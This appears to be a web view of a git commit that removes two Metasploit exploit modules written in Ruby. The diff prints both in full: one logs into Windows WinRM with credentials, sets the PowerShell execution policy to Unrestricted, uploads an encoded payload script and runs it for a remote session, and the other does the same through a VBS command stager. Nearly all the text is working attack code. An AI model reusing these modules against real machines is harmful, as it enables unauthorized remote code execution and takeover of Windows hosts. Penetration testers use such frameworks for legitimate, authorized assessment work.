Remove the older modules
parent
fca8208171
commit
25a6e983a1
|
@ -1,177 +0,0 @@
|
||||||
##
|
|
||||||
# $Id$
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
|
||||||
# web site for more information on licensing and terms of use.
|
|
||||||
# http://metasploit.com/
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
|
||||||
Rank = ManualRanking
|
|
||||||
|
|
||||||
include Msf::Exploit::Remote::WinRM
|
|
||||||
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'WinRM Powershell Remote Code Execution',
|
|
||||||
'Description' => %q{
|
|
||||||
This module uses valid credentials to login to the WinRM service
|
|
||||||
and execute a payload as a powershell script. It then attempts to
|
|
||||||
automigrate before the WinRS shell dies.
|
|
||||||
|
|
||||||
It is important to use an x64 payload if your target system is x64.
|
|
||||||
The target machine must be running Powershell 2.0 for the payload
|
|
||||||
to work.
|
|
||||||
},
|
|
||||||
'Author' => [ 'thelightcosine' ],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Privileged' => true,
|
|
||||||
'DefaultOptions' =>
|
|
||||||
{
|
|
||||||
'WfsDelay' => 30,
|
|
||||||
'EXITFUNC' => 'thread',
|
|
||||||
'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
|
|
||||||
},
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[ 'Windows with Powershell 2.0', { } ],
|
|
||||||
],
|
|
||||||
'DefaultTarget' => 0,
|
|
||||||
'DisclosureDate' => 'Nov 01 2012'
|
|
||||||
))
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
|
||||||
unless accepts_ntlm_auth
|
|
||||||
print_error "The Remote WinRM server does not appear to allow Negotiate(NTLM) auth"
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status "checking for Powershell 2.0"
|
|
||||||
streams = winrm_run_cmd("powershell Get-Host")
|
|
||||||
if streams == 401
|
|
||||||
print_error "Login failed!"
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
unless streams.class == Hash
|
|
||||||
print_error "Recieved error while running check"
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
streams['stdout'].each_line do |line|
|
|
||||||
next unless line.start_with? "Version"
|
|
||||||
major_version = line.match(/\d(?=\.)/)[0]
|
|
||||||
if major_version == 1
|
|
||||||
print_error "The target is running an older version of powershell"
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status "Attempting to set Execution Policy"
|
|
||||||
streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
|
|
||||||
if streams == 401
|
|
||||||
print_error "Login failed!"
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
unless streams.class == Hash
|
|
||||||
print_error "Recieved error while running check"
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
|
|
||||||
if streams['stdout'].include? 'Unrestricted'
|
|
||||||
return Msf::Exploit::CheckCode::Vulnerable
|
|
||||||
else
|
|
||||||
unless streams['stderr'] == ''
|
|
||||||
print_error streams['stderr']
|
|
||||||
end
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
unless check == Msf::Exploit::CheckCode::Vulnerable
|
|
||||||
print_error "Unable to set Execution Policy"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
path = upload_script
|
|
||||||
return if path.nil?
|
|
||||||
exec_script(path)
|
|
||||||
handler
|
|
||||||
end
|
|
||||||
|
|
||||||
def upload_script
|
|
||||||
tdir = temp_dir
|
|
||||||
return if tdir.nil?
|
|
||||||
path = tdir + "\\" + ::Rex::Text.rand_text_alpha(8) + ".ps1"
|
|
||||||
print_status "Uploading powershell script to #{path} (This may take a few minutes)..."
|
|
||||||
|
|
||||||
script = Msf::Util::EXE.to_win32pe_psh(framework,payload.encoded)
|
|
||||||
#add a sleep to the script to give us enoguh time to establish a session
|
|
||||||
script << "\n Start-Sleep -s 600"
|
|
||||||
script.each_line do |psline|
|
|
||||||
#build our psh command to write out our psh script, meta eh?
|
|
||||||
script_line = "Add-Content #{path} '#{psline.chomp}' "
|
|
||||||
cmd = encoded_psh(script_line)
|
|
||||||
streams = winrm_run_cmd(cmd)
|
|
||||||
end
|
|
||||||
return path
|
|
||||||
end
|
|
||||||
|
|
||||||
def exec_script(path)
|
|
||||||
print_status "Attempting to execute script..."
|
|
||||||
cmd = "powershell -File #{path}"
|
|
||||||
resp,c = send_request_ntlm(winrm_open_shell_msg)
|
|
||||||
if resp.nil?
|
|
||||||
print_error "Got no reply from target"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
unless resp.code == 200
|
|
||||||
print_error "Got unexpected response from #{ip}: \n #{resp.to_s}"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
shell_id = winrm_get_shell_id(resp)
|
|
||||||
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
|
|
||||||
cmd_id = winrm_get_cmd_id(resp)
|
|
||||||
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
|
|
||||||
streams = winrm_get_cmd_streams(resp)
|
|
||||||
end
|
|
||||||
|
|
||||||
def encoded_psh(script)
|
|
||||||
script = script.chars.to_a.join("\x00").chomp
|
|
||||||
script << "\x00" unless script[-1].eql? "\x00"
|
|
||||||
script = Rex::Text.encode_base64(script).chomp
|
|
||||||
cmd = "powershell -encodedCommand #{script}"
|
|
||||||
end
|
|
||||||
|
|
||||||
def temp_dir
|
|
||||||
print_status "Grabbing %TEMP%"
|
|
||||||
resp,c = send_request_ntlm(winrm_open_shell_msg)
|
|
||||||
if resp.nil?
|
|
||||||
print_error "Got no reply from the server"
|
|
||||||
return nil
|
|
||||||
end
|
|
||||||
unless resp.code == 200
|
|
||||||
print_error "Got unexpected response: \n #{resp.to_s}"
|
|
||||||
return nil
|
|
||||||
end
|
|
||||||
shell_id = winrm_get_shell_id(resp)
|
|
||||||
cmd = "echo %TEMP%"
|
|
||||||
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
|
|
||||||
cmd_id = winrm_get_cmd_id(resp)
|
|
||||||
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
|
|
||||||
streams = winrm_get_cmd_streams(resp)
|
|
||||||
return streams['stdout'].chomp
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,86 +0,0 @@
|
||||||
##
|
|
||||||
# $Id$
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
|
||||||
# web site for more information on licensing and terms of use.
|
|
||||||
# http://metasploit.com/
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
|
||||||
Rank = ManualRanking
|
|
||||||
|
|
||||||
include Msf::Exploit::Remote::WinRM
|
|
||||||
include Msf::Exploit::CmdStagerVBS
|
|
||||||
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'WinRM VBS Remote Code Execution',
|
|
||||||
'Description' => %q{
|
|
||||||
This module uses valid credentials to login to the WinRM service
|
|
||||||
and execute a VBS cmdstager.
|
|
||||||
},
|
|
||||||
'Author' => [ 'thelightcosine' ],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Privileged' => true,
|
|
||||||
'DefaultOptions' =>
|
|
||||||
{
|
|
||||||
'WfsDelay' => 30,
|
|
||||||
'EXITFUNC' => 'thread',
|
|
||||||
'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
|
|
||||||
},
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[ 'Windows', { } ],
|
|
||||||
],
|
|
||||||
'DefaultTarget' => 0,
|
|
||||||
'DisclosureDate' => 'Nov 01 2012'
|
|
||||||
))
|
|
||||||
|
|
||||||
register_advanced_options(
|
|
||||||
[
|
|
||||||
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
|
|
||||||
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")]),
|
|
||||||
], self.class)
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
|
||||||
unless accepts_ntlm_auth
|
|
||||||
print_error "The Remote WinRM server does not appear to allow Negotiate(NTLM) auth"
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
execute_cmdstager
|
|
||||||
handler
|
|
||||||
end
|
|
||||||
|
|
||||||
def execute_command(cmd,opts)
|
|
||||||
commands = cmd.split(/&/)
|
|
||||||
commands.each do |command|
|
|
||||||
if command.include? "cscript"
|
|
||||||
streams = winrm_run_cmd_hanging(command)
|
|
||||||
print_status streams.inspect
|
|
||||||
elsif command.include? "del %TEMP%"
|
|
||||||
next
|
|
||||||
else
|
|
||||||
winrm_run_cmd(command)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
Loading…
Reference in New Issue